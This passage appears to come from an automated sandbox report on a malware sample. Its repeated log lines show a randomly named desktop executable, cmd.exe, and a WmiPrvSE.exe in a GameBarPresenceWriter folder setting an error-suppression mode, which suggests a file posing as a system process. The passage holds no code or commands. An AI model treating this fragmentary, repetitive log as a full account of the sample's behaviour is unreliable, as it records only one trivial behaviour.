Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
